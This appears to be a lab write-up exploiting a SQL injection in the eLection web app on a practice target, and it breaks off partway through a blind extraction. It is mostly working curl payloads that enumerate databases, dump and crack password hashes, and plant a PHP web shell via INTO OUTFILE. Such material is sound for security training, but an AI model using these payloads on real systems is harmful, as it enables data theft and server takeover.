InfoSec LAB

Election1_SQLi

Created: 24 min read

SQL Injection

A SQL injection vulnerability, CVE-2020-9340, has been identified in the target eLection instance due to its outdated version; 2.0

The vulnerability is present at the id parameter when sending a POST request to the /election/admin/ajax/op_kandidat.php endpoint.

UNION-based In-band

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '123 UNION SELECT 1,2,3,4,5 -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"                   
{"code":"200","nama":"2","kelas":"3","fbid":"5","bio":"4"}
real	0.06s
user	0.01s
sys	0.01s
cpu	18%

5 columns identified.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '123 UNION SELECT 1,user(),database(),4,@@version -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"200","nama":"newuser@localhost","kelas":"election","fbid":"10.1.44-MariaDB-0ubuntu0.18.04.1","bio":"4"}
real	0.05s
user	0.01s
sys	0.00s
cpu	16%
  • The current user is newuser@localhost
  • The backend DB is election
  • The backend DB version is 10.1.44-MariaDB-0ubuntu0.18.04.1

Databases (UNION-based In-band)

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '123 UNION SELECT 1,schema_name,3,4,5 FROM information_schema.schemata-- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"404"}
real	0.05s
user	0.01s
sys	0.00s
cpu	14%

For some reason, this fails to execute the SQL query.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '123 UNION SELECT 1,schema_name,3,4,5 FROM information_schema.schemata LIMIT 1 OFFSET 0 -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"200","nama":"election","kelas":"3","fbid":"5","bio":"4"}
real	0.13s
user	0.01s
sys	0.00s
cpu	5%

Identify the issue. The issue was that the backend expects exactly one row to be returned by the SQL query. Therefore, I can limit the row with LIMIT 1 and rotate through with OFFSET election DB

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '123 UNION SELECT 1,schema_name,3,4,5 FROM information_schema.schemata LIMIT 1 OFFSET 1 -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"     
{"code":"200","nama":"information_schema","kelas":"3","fbid":"5","bio":"4"}
real	0.05s
user	0.01s
sys	0.00s
cpu	12%

information_schema default DB

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '123 UNION SELECT 1,schema_name,3,4,5 FROM information_schema.schemata LIMIT 1 OFFSET 2 -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"200","nama":"mysql","kelas":"3","fbid":"5","bio":"4"}
real	0.05s
user	0.00s
sys	0.00s
cpu	13%

mysql default DB

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '123 UNION SELECT 1,schema_name,3,4,5 FROM information_schema.schemata LIMIT 1 OFFSET 3 -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"200","nama":"performance_schema","kelas":"3","fbid":"5","bio":"4"}
real	0.05s
user	0.01s
sys	0.00s
cpu	14%

performance_schema default DB

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '123 UNION SELECT 1,GROUP_CONCAT(schema_name),3,4,5 FROM information_schema.schemata -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"   
{"code":"200","nama":"election,information_schema,mysql,performance_schema","kelas":"3","fbid":"5","bio":"4"}
real	0.05s
user	0.01s
sys	0.00s
cpu	13%

Or just put them all into the GROUP_CONCAT function; election,information_schema,mysql,performance_schema

election DB (UNION-based In-band)

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '123 UNION SELECT 1,GROUP_CONCAT(table_name),3,4,5 FROM information_schema.tables WHERE table_schema="election"-- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"200","nama":"tb_guru,tb_hakpilih,tb_kandidat,tb_level,tb_panitia,tb_pengaturan,tb_polling,tb_siswa","kelas":"3","fbid":"5","bio":"4"}
real	0.05s
user	0.01s
sys	0.00s
cpu	16%

Lots of tables within the election DB Those are Indonesian tb_guru,tb_hakpilih,tb_kandidat,tb_level,tb_panitia,tb_pengaturan,tb_polling,tb_siswa translating to tb_teacher,tb_voting rights,tb_candidate,tb_level,tb_committee,tb_settings,tb_polling,tb_student

tb_panitia(tb_committee) Tables seems most relevant.

election.tb_panitia Table (UNION-based In-band)
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '123 UNION SELECT 1,GROUP_CONCAT(column_name),3,4,5 FROM information_schema.columns WHERE table_schema="election" AND table_name="tb_panitia"-- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"   
{"code":"200","nama":"id,no_induk,nama,level,password","kelas":"3","fbid":"5","bio":"4"}
real	0.06s
user	0.00s
sys	0.00s
cpu	12%

id,no_induk,nama,level,password columns, translating to id,parent_number,name,level,password

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '123 UNION SELECT 1,GROUP_CONCAT(nama,":",password),3,4,5 FROM election.tb_panitia-- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"200","nama":"Love:bb113886b0513a9d882e3caa5cd73314","kelas":"3","fbid":"5","bio":"4"}
real	0.05s
user	0.01s
sys	0.00s
cpu	19%

That the credential hash of the Love account. The password of the Love account was already disclosed in the card.php file.

mysql DB (UNION-based In-band)

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '123 UNION SELECT 1,GROUP_CONCAT(table_name),3,4,5 FROM information_schema.tables WHERE table_schema="mysql"-- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"   
{"code":"200","nama":"column_stats,columns_priv,db,event,func,general_log,gtid_slave_pos,help_category,help_keyword,help_relation,help_topic,host,index_stats,innodb_index_stats,innodb_table_stats,plugin,proc,procs_priv,proxies_priv,roles_mapping,servers,slow_log,table_stats,tables_priv,time_zone,time_zone_leap_second,time_zone_name,time_zone_transition,time_zone_transition_type,user","kelas":"3","fbid":"5","bio":"4"}
real	0.06s
user	0.01s
sys	0.00s
cpu	15%
mysql.user Table (UNION-based In-band)
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '123 UNION SELECT 1,GROUP_CONCAT(column_name),3,4,5 FROM information_schema.columns WHERE table_schema="mysql" AND table_name="user"-- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"   
{"code":"200","nama":"Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,Repl_client_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Create_user_priv,Event_priv,Trigger_priv,Create_tablespace_priv,ssl_type,ssl_cipher,x509_issuer,x509_subject,max_questions,max_updates,max_connections,max_user_connections,plugin,authentication_string,password_expired,is_role,default_role,max_statement_time","kelas":"3","fbid":"5","bio":"4"}
real	0.07s
user	0.00s
sys	0.00s
cpu	12%

User and Password Columns

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '123 UNION SELECT 1,GROUP_CONCAT(user,":",Password),3,4,5 FROM mysql.user-- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"200","nama":"root:*9CFBBC772F3F6C106020035386DA5BBBF1249A11,newuser:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19","kelas":"3","fbid":"5","bio":"4"}
real	0.06s
user	0.01s
sys	0.00s
cpu	13%
  • root:9CFBBC772F3F6C106020035386DA5BBBF1249A11
  • newuser:2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
Password Cracking
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ hashcat -a 0 -m 300 hashes.txt /usr/share/wordlists/rockyou.txt                             
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 2 digests; 2 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
2470c0c06dee42fd1618bb99005adca2ec9d1e19:password         
Approaching final keyspace - workload adjusted.           
 
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 300 (MySQL4.1/MySQL5)
Hash.Target......: hashes.txt
Time.Started.....: Tue Jul  1 23:23:02 2025 (2 secs)
Time.Estimated...: Tue Jul  1 23:23:04 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  7739.2 kH/s (0.39ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 1/2 (50.00%) Digests (total), 1/2 (50.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[216361726f6c796e] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 21%
 
Started: Tue Jul  1 23:23:01 2025
Stopped: Tue Jul  1 23:23:05 2025

Password hash cracked for the newuser account; password This credential maybe used at the target phpMyAdmin instance

File Write (UNION-based In-band)

The phpinfo.php file reveals the DOCUMENT_ROOT attribute pointing to the web root directory; /var/www/html

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '123 UNION SELECT 1,"<?php system($_GET['cmd']); ?>",3,4,5 INTO OUTFILE "/var/www/html/election/shell.php" -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	0.05s
user	0.01s
sys	0.00s
cpu	13%

Writing a PHP web shell into /var/www/html/election/shell.php

File Read (UNION-based In-band)

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '123 UNION SELECT 1,LOAD_FILE("/var/www/html/election/shell.php"),3,4,5 -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"200","nama":"1\t<?php system($_GET[cmd]); ?>\t3\t4\t5\n","kelas":"3","fbid":"5","bio":"4"}
real	0.05s
user	0.01s
sys	0.00s
cpu	15%

Confirmed

Execute (UNION-based In-band)

Moving on to the Exploitation phase.

Boolean-based Blind

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 or 1=1 -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.00s
sys	0.01s
cpu	16%

Confirmed.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM dual WHERE user() LIKE "new%") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"   
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	14%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM dual WHERE user()="newuser@localhost") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"  
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.00s
sys	0.00s
cpu	14%

The current user is newuser@localhost. FROM dual is for dummy table as a placeholder and may be omitted.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) WHERE database() LIKE "ele%") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"  
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	14%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) WHERE database()="election") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"      
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	17%

The current database is election.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM dual WHERE version() LIKE "10%") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"  
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	14%
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM dual WHERE version() LIKE "10.1.44-MariaDB-0ubuntu0%") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	16%
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM dual WHERE version()="10.1.44-MariaDB-0ubuntu0.18.04.1") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	16%

The backend DB version is 10.1.44-MariaDB-0ubuntu0.18.04.1.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR EXISTS(SELECT 1 FROM dual WHERE database()="election") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	14%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR EXISTS(SELECT 1 WHERE user()="newuser@localhost") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"     
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	15%

EXISTS clause may also be used instead as it could be more reliable.

Databases (Boolean-based Blind)

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(schema_name) FROM information_schema.schemata)=4-- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	14%

Using count function, there are a total of 4 databases

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.schemata WHERE schema_name LIKE "e%") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"              
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.00s
sys	0.00s
cpu	14%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.schemata WHERE schema_name="election") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	14%

election DB, which is the current DB.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.schemata WHERE schema_name="information_schema") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	16%

The default information_schema DB.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.schemata WHERE schema_name="performance_schema") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.00s
sys	0.00s
cpu	16%

The default performance_schema DB.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.schemata WHERE schema_name="mysql") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"             
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	14%

The default mysql DB.

election DB (Boolean-based Blind)

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema="election")=8 -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.00s
sys	0.00s
cpu	13%

Using count function, there are a total of 8 tables within the election DB

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema="election" AND table_name LIKE "tb%") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.00s
sys	0.01s
cpu	14%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema="election" AND table_name="tb_panitia") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	14%

election.tb_panitia table identified.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema="election" AND table_name="tb_pengaturan") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	13%

election.tb_pengaturan table identified.

election.tb_panitia Table (Boolean-based Blind)
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema="election" AND table_name="tb_panitia")=5 -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	13%

Using count function, there are a total of 5 columns within the election.tb_panitia table.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema="election" AND table_name="tb_panitia" AND column_name LIKE "passwo%") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.00s
sys	0.00s
cpu	14%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema="election" AND table_name="tb_panitia" AND column_name="password") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"     
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.00s
sys	0.00s
cpu	15%

election.tb_panitia.password column identified.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema="election" AND table_name="tb_panitia" AND column_name LIKE "nam%") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"    
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.00s
sys	0.00s
cpu	15%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema="election" AND table_name="tb_panitia" AND column_name="nama") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"     
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	16%

election.tb_panitia.nama column identified.

election.tb_panitia Credential Exfiltration (Boolean-based Blind)
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM election.tb_panitia WHERE nama LIKE "L%") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	14%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM election.tb_panitia WHERE nama="Love") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"     
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.00s
sys	0.01s
cpu	15%

Love user in the election.tb_panitia.nama column.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM election.tb_panitia WHERE nama="Love" AND LENGTH(password)=32) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"     
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.06s
user	0.00s
sys	0.00s
cpu	15%

Length of the Love user’s password is 32 character.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM election.tb_panitia WHERE nama="Love" AND password LIKE "bb113886b0513a9d%") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	14%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
